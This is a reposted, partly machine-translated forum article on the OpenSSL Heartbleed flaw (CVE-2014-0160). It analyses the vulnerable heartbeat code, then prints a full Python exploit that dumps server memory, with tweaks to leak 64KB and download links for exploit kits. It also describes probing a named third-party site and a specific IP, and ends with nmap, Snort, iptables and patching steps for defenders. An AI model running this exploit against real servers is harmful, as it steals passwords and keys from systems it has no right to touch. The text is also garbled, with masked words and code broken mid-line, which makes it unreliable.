Shulou(Shulou.com)06/01 Report--

This post was last edited by simeon at 10:54 on 2014-4-11.

Www.antian365.com simeon

First, the cause of openssl loophole

On April 7th, it was revealed that there was a serious security loophole in the Internet security protocol OpenSSL. In the community, it was named "Heart Hemorrhage", indicating a "fatal internal injury" on the Internet. Taking advantage of this vulnerability, * * can obtain the login account passwords of about 30% of the https-beginning URLs, including well-known websites such as shopping, online banking, social networking, portals and so on. The vulnerability was first released on April 7, when the original author, Sean Cassidy, published "existential type crisis: Diagnosis of the OpenSSL Heartbleed Bug" (http://blog.existentialize.com/d. Heartbleed-bug.html). OpenSSL issued a security bulletin on April 7, 2014. there is a serious vulnerability in the OpenSSL1.0.1 version (CVE-2014-0160), which exists in the ssl/dl_both.c file. There is a BUG in the OpenSSL Heartbleed module. When the * * user constructs a special packet that cannot provide enough data in the user's heartbeat packet, it will cause memcpy to output the data recorded by SSLv3 directly. This vulnerability allows * users to remotely read data with 64K in the memory of the vulnerable version of openssl server.

1. Loophole analysis

The vulnerability exists in the file ssl/dl_both.c, and the patch for the vulnerability starts with this line of statement:

Int

Dtls1_process_heartbeat (SSL * s)

{

Unsigned char * p = & s-> S3-> rrec.data [0], * pl

Unsigned short hbtype

Unsigned int payload

Unsigned int padding = 16; / * Use minimum padding * /

The definition of structure SSL3_RECORD is as follows

Typedef struct ssl3_record_st

{

Int type; / * type of record * /

Unsigned int length; / * How many bytes available * /

Unsigned int off; / * read/write offset into 'buf' * /

Unsigned char * data; / * pointer to the record data * /

Unsigned char * input; / * where the decode bytes are * /

Unsigned char * comp; / * only used with decompression-malloc () ed * /

Unsigned long epoch; / * epoch number, needed by DTLS1 * /

Unsigned char seq_num [8]; / * sequence number, needed by DTLS1 * /

} SSL3_RECORD

Each SSLv3 record contains a type field (type), a length field (length), and a pointer to the record data (data). In dtls1_process_heartbeat:

/ * Read type and payload length first * /

Hbtype = * paired +

N2s (p, payload)

Pl = p

The first byte of the SSLv3 record indicates the type of heartbeat packet. Macro N2s takes the first two bytes from the array pointed to by pointer p and stores them in the variable payload-- which is actually the length field (length) of the heartbeat packet load. Note that the program does not check the actual length of this SSLv3 record. The variable pl points to the heartbeat packet data provided by the visitor.

The following work is done at the end of this function:

Unsigned char * buffer, * bp

Int r

/ * Allocate memory for the response, size is 1 byte

* message type, plus 2 bytes payload length, plus

* payload, plus padding

, /

Buffer = OPENSSL_malloc (1 + 2 + payload + padding)

Bp = buffer

So the program will allocate a memory area of the size specified by the visitor, which is up to (65535 + 1 + 2 + 16) bytes. The variable bp is the pointer used to access this area of memory.

/ * Enter response type, length and copy payload * /

* bp++ = TLS1_HB_RESPONSE

S2n (payload, bp)

Memcpy (bp, pl, payload)

Macro s2n does the exact opposite of macro n2s: s2n reads in a value of 16 bit and stores it as a double-byte value, so s2n stores the same length value as the requested heartbeat load in the variable payload. The program then starts copying payload bytes from pl into the newly allocated bp array-pl points to the user-supplied heartbeat packet data. Finally, the program sends all the data back to the user.

two。 Users can control variables payload and pl to become exploitable vulnerabilities

What happens if the user does not provide enough data in the heartbeat packet? For example, if the data that pl points to is actually only one byte, then memcpy will copy out the data after the SSLv3 record-- whatever that data is.

Second, available POC and its testing

1. Poc acquisition

The POC written by foreign people appeared on the Internet shortly after the vulnerability was announced. at the first time of the release of the vulnerability, we analyzed and verified whether the vulnerability could obtain some sensitive information. At the same time as the vulnerability is released, the available scripts have also been circulated on the network. The following vulnerability exploits the download address of the script:

Http://s3.jspenguin.org/ssltest.py (python script)

Http://pan.baidu.com/s/1nt3BnVB (python script)

Https://github.com/decal/ssltest-stls/blob/master/ssltest-stls.py

Https://raw.githubusercontent.co... Ter/ssltest-stls.py

Online detection:

Http://possible.lv/tools/hb/

Http://filippo.io/Heartbleed/

2. Poc code

Save the following code as a ssltest.py file with the following Poc code:

#! / usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email] jspenguin@ jspenguin.org [/ email])

# The author disclaims copyright to this source code.

Import sys

Import struct

Import socket

Import time

Import select

Import re

From optparse import OptionParser

Options = OptionParser (usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

Options.add_option ('- paired,'--port', type='int', default=443, help='TCP port to test (default: 443)')

Def h3bin (x):

Return x.replace (','). Replace ('\ n','). Decode ('hex')

Hello = h3bin ('

16 03 02 00 dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf

Bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88

00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c

C0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09

C0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44

C0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c

C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00

00 0f 00 01 01

'')

Hb = h3bin ('

18 03 02 00 03

01 40 00

'')

Def hexdump (s):

For b in xrange (0, len (s), 16):

Lin = [c for c in s [b: B + 16]]

Hxdat = '.join (' X'% ord (c) for c in lin)

Pdat = '.join (c if 32 3:

Print 'WARNING: server returned more data than it should-server is others

Else:

Print 'Server processed malformed heartbeat, but did not return any extra data.'

Return True

If typ = = 21:

Print 'Received alert:'

Hexdump (pay)

Print 'Server returned error, likely not vulnerable'

Return False

Def main ():

Opts, args = options.parse_args ()

If len (args)

< 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() 复制代码 3.具体测试方法 openssl.py / ssltest.py，用法：python openssl.py ip/域名 -p 端口 网上POC作者公布的代码每次只dump 16kb 内存，如果需要dump 64kb内存需要做如下修改： hb = h3bin(''' 18 03 02 00 03 01 40 00 //此处修改为01 ff ff ''') 将"for b in xrange(0, len(s), 16)"改成"for b in xrange(0, len(s), 64)" 后期还出现支持支持smtp, pop3, imap, ftp, or xmpp的POC（http://lcx.cc/?i=4276）。 三、openssl检测技术 利用openssl心脏出血漏洞利用代码，笔者第一时间进行测试，测试分为两个方面，一个是通过网页在线检测，另外就是通过脚本直接获取内存内容。 1.网页检测 网页检测使用网站"http://possible.lv/tools/hb/"效果较好，打开该页面后，在输入框中输入网站域名地址即可，如果默认端口不是443，则需要输入具体的端口，例如www.somesite.com:4433，则表示端口为4433，检测会有进度条显示，100%后，会在下面显示检测结果。如图1所示，则表示不存在漏洞。随机更换一个网站地址，如图2所示，获取该网站存在漏洞。 图1在线检测漏洞 图2获取kuaiyinpan.com存在漏洞 2.通过py脚本进行检测 在linux 终端窗口中输入"python ssltest.py 66.175.219.225 -p 443"命令，如图3所示获取该漏洞提示信息"ver=0302"该版本表示存在漏洞。在获取的内容中可能会包含用户密码和用户名等信息。 图3通过py脚本进行测试 3.对存在漏洞的网站进行扫描检测 下载nmap最新版本，在本地进行编译，或者使用命令进行更新"nmap --script-updatedb"，或者下载"wgethttps://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse"，世界测试过程中直接下载该脚本会缺少一些模块，然后通过以下命令进行扫描： nmap -p 443 --script ssl-heartbleed 66.175.219.225 如果存在漏洞，则会给出该漏洞的相关提示，如图4所示。 图4扫描检测存在漏洞服务器 4.通用Snort规则检测 由于众所周知的SSL协议是加密的，我们目前没有找到提取可匹配规则的方法，我们尝试编写了一条基于返回数据大小的检测规则，其有效性我们会继续验证，如果有问题欢迎反馈。alert tcp $EXTERNAL_NET any ->

$HOME_NET 443 (msg: "openssl Heartbleed attack"; flow:to_server,established; content: "| 18 03 |"; depth: 3; byte_test:2, >, 200,3, big; byte_test:2, & 1 | grep 'heartbeart'

(3) if you cannot upgrade OpenSSL, you can update IPTable firewall rules. T# Log rules

Iptables-t filter-An INPUT-p tcp-- dport 443-MU32-- U32\

"52=0x18030000:0x1803FFFF"-j LOG-log-prefix "BLOCKED: HEARTBEAT"

# Block rules

Iptables-t filter-An INPUT-p tcp-- dport 443-MU32-- U32\ "52=0x18030000:0x1803FFFF"-j DROP

Reference for 3.centos repair method

(1) yum method installation

Yum search openssl

Yum install openssl

/ etc/init.d/nginx restart # then restart nginx

(2) download, compile and install

Wget http://www.openssl.org/source/openssl-1.0.1g.tar.gz

Cd openssl-1.0.1g

. / config

Make & & make install

/ etc/init.d/nginx restart # restart nginx

Reference article:

(1) http://blog.existentialize.com/d... Heartbleed-bug.html

(2) http://drops.wooyun.org/papers/1381

(3) http://bbs.safedog.cn/thread-60096-1-1.html

(4) http://www.techweb.com.cn/ucweb/news/id/2025856

(5) download address of the test kit:

Http://www.antian365.com/forum.p... Id=12061&extra=

Http://www.antian365.com/tools/0day/openssl.zip

(6) determine whether Heartbeat's NSE script http://www.freebuf.com/articles/system/31499.html is supported.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.